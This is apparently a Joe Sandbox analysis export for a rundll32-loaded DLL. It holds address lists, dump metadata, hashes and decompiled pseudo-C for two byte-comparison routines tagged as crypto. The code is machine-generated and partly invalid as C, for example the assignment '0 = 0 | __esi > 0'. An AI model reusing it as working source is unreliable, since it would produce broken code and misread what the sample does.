0x10012ddb
0x00000000
0x00000000
0x00000000
0x10012ddb
0x10012db6
0x10012dba
0x00000000
0x00000000
0x00000000
0x10012dba
0x10012d18
0x10012d1a
0x10012d31
0x10012d39
0x10012d3b
0x10012d52
0x10012d5a
0x10012d5c
0x10012d73
0x10012d7b
0x10012d7d
0x10012d8a
0x10012d8a
0x00000000
0x10012d7d
0x10012d69
0x10012d6d
0x00000000
0x00000000
0x00000000
0x10012d6d
0x10012d48
0x10012d4c
0x00000000
0x00000000
0x00000000
0x10012d4c
0x10012d27
0x10012d2b
0x00000000
0x00000000
0x00000000
0x10012d2b
0x10012c89
0x10012c8b
0x10012ca2
0x10012caa
0x10012cac
0x10012cc3
0x10012ccb
0x10012ccd
0x10012ce4
0x10012cec
0x10012cee
0x10012cfb
0x10012cfb
0x00000000
0x10012cee
0x10012cda
0x10012cde
0x00000000
0x00000000
0x00000000
0x10012cde
0x10012cb9
0x10012cbd
0x00000000
0x00000000
0x00000000
0x10012cbd
0x10012c98
0x10012c9c
0x00000000
0x00000000
0x00000000
0x10012c9c
0x10012bfa
0x10012bfc
0x10012c13
0x10012c1b
0x10012c1d
0x10012c34
0x10012c3c
0x10012c3e
0x10012c55
0x10012c5d
0x10012c5f
0x10012c6c
0x10012c6c
0x00000000
0x10012c5f
0x10012c4b
0x10012c4f
0x00000000
0x00000000
0x00000000
0x10012c4f
0x10012c2a
0x10012c2e
0x00000000
0x00000000
0x00000000
0x10012c2e
0x10012c09
0x10012c0d
0x00000000
0x00000000
0x00000000
0x10012b64
0x10012b64
0x10012b67
0x10012b6b
0x10012b6d
0x10012b84
0x10012b84
0x10012b88
0x10012b8c
0x10012b8e
0x10012ba5
0x10012ba5
0x10012ba9
0x10012bad
0x10012baf
0x10012bc6
0x10012bc6
0x10012bca
0x10012bce
0x10012bd0
0x10012bd6
0x10012bd9
0x10012bdd
0x10012bdd
0x00000000
0x10012bd0
0x10012bb5
0x10012bb8
0x10012bbc
0x10012bc0
0x00000000
0x00000000
0x00000000
0x10012bc0
0x10012b94
0x10012b97
0x10012b9b
0x10012b9f
0x00000000
0x00000000
0x00000000
0x10012b9f
0x10012b73
0x10012b76
0x10012b7a
0x10012b7e
0x00000000
0x00000000
0x00000000
0x10012b7e
0x10012375
0x10012375
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 02d0a4e57c013a4262b4f69ce3ee84d6378c8a91eb9bdfd177f7134edb493f76
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: F4D15FF3C0E9F3068779C52D505812EEAA2AFC15D131BC3E19CE42F299D63ADDA096D0

Uniqueness

Uniqueness Score: -1.00%

Function 10012750, Relevance: .4, Instructions: 361
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10012750(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}

0x10012750
0x10012750
0x10012756
0x100127d5
0x100127d7
0x100127d9
0x00000000
0x00000000
0x100127df
0x100127e5
0x10012864
0x10012866
0x10012868
0x00000000
0x00000000
0x1001286e
0x10012874
0x100128f3
0x100128f5
0x100128f7
0x00000000
0x00000000
0x100128fd
0x10012903
0x10012982
0x10012984
0x10012986
0x00000000
0x00000000
0x1001298c
0x10012992
0x10012a11
0x10012a13
0x10012a15
0x00000000
0x00000000
0x10012a21
0x10012aa1
0x10012aa3
0x10012aa5
0x00000000
0x00000000
0x10012aab
0x10012ab1
0x10012b30
0x10012b32
0x10012b34
0x00000000
0x00000000
0x10012b42
0x10012b44
0x10012b55
0x10012b55
0x1001274a
0x100134a6
0x100134a6
0x10012aba
0x10012abc
0x10012ad3
0x10012adb
0x10012add
0x10012af4
0x10012afc
0x10012afe
0x10012b15
0x10012b1d
0x10012b1f
0x10012b2c
0x10012b2c
0x00000000
0x10012b1f
0x10012b0b
0x10012b0f
0x00000000
0x00000000
0x00000000
0x10012b0f
0x10012aea
0x10012aee
0x00000000
0x00000000
0x00000000
0x10012aee
0x10012ac9
0x10012acd
0x00000000
0x00000000
0x00000000
0x10012acd
0x10012a2b
0x10012a2d
0x10012a44
0x10012a4c
0x10012a4e
0x10012a65
0x10012a6d
0x10012a6f
0x10012a86
0x10012a8e
0x10012a90
0x10012a9d
0x10012a9d
0x00000000
0x10012a90
0x10012a7c
0x10012a80
0x00000000
0x00000000
0x00000000
0x10012a80
0x10012a5b
0x10012a5f
0x00000000
0x00000000
0x00000000
0x10012a5f
0x10012a3a
0x10012a3e
0x00000000
0x00000000
0x00000000
0x10012a3e
0x1001299b
0x1001299d
0x100129b4
0x100129bc
0x100129be
0x100129d5
0x100129dd
0x100129df
0x100129f6
0x100129fe
0x10012a00
0x10012a0d
0x10012a0d
0x00000000
0x10012a00
0x100129ec
0x100129f0
0x00000000
0x00000000
0x00000000
0x100129f0
0x100129cb
0x100129cf
0x00000000
0x00000000
0x00000000
0x100129cf
0x100129aa
0x100129ae
0x00000000
0x00000000
0x00000000
0x100129ae
0x1001290c
0x1001290e
0x10012925
0x1001292d
0x1001292f
0x10012946
0x1001294e
0x10012950
0x10012967
0x1001296f
0x10012971
0x1001297e
0x1001297e
0x00000000
0x10012971
0x1001295d
0x10012961
0x00000000
0x00000000
0x00000000
0x10012961
0x1001293c
0x10012940
0x00000000
0x00000000
0x00000000
0x10012940
0x1001291b
0x1001291f
0x00000000
0x00000000
0x00000000
0x1001291f
0x1001287d
0x1001287f
0x10012896
0x1001289e
0x100128a0
0x100128b7
0x100128bf
0x100128c1
0x100128d8
0x100128e0
0x100128e2
0x100128ef
0x100128ef
0x00000000
0x100128e2
0x100128ce
0x100128d2
0x00000000
0x00000000
0x00000000
0x100128d2
0x100128ad
0x100128b1
0x00000000
0x00000000
0x00000000
0x100128b1
0x1001288c
0x10012890
0x00000000
0x00000000
0x00000000
0x10012890
0x100127ee
0x100127f0
0x10012807
0x1001280f
0x10012811
0x10012828
0x10012830
0x10012832
0x10012849
0x10012851
0x10012853
0x10012860
0x10012860
0x00000000
0x10012853
0x1001283f
0x10012843
0x00000000
0x00000000
0x00000000
0x10012843
0x1001281e
0x10012822
0x00000000
0x00000000
0x00000000
0x10012822
0x100127fd
0x10012801
0x00000000
0x00000000
0x00000000
0x10012758
0x10012758
0x1001275b
0x1001275f
0x10012761
0x10012778
0x10012778
0x1001277c
0x10012780
0x10012782
0x10012799
0x10012799
0x1001279d
0x100127a1
0x100127a3
0x100127ba
0x100127ba
0x100127be
0x100127c2
0x100127c4
0x100127ca
0x100127cd
0x100127d1
0x100127d1
0x00000000
0x100127c4
0x100127a9
0x100127ac
0x100127b0
0x100127b4
0x00000000
0x00000000
0x00000000
0x100127b4
0x10012788
0x1001278b
0x1001278f
0x10012793
0x00000000
0x00000000
0x00000000
0x10012793
0x10012767
0x1001276a
0x1001276e
0x10012772
0x00000000
0x00000000
0x00000000
0x10012772
0x10012375
0x10012375
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: ac29165fb5a3a9d2b426555fe60b450391b057459812014a8e2f953e3e94d0cc
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: BEC150F3C0E9F34A8779C52D505812FEAA2AFC25D131BC3E08CE43F299953A9DA495D0

Uniqueness

Uniqueness Score: -1.00%

Function 1001237C, Relevance: .4, Instructions: 351
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001237C(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}

0x1001237c
0x1001237c
0x10012382
0x100123f5
0x100123f7
0x100123f9
0x00000000
0x00000000
0x100123ff
0x10012405
0x10012484
0x10012486
0x10012488
0x00000000
0x00000000
0x1001248e
0x10012494
0x10012513
0x10012515
0x10012517
0x00000000
0x00000000
0x1001251d
0x10012523
0x100125a2
0x100125a4
0x100125a6
0x00000000
0x00000000
0x100125b2
0x10012632
0x10012634
0x10012636
0x00000000
0x00000000
0x1001263c
0x10012642
0x100126c1
0x100126c3
0x100126c5
0x00000000
0x00000000
0x100126cb
0x100126d1
0x10012742
0x10012744
0x10012746
0x10012748
0x10012748
0x1001274a
0x100134a6
0x100134a6
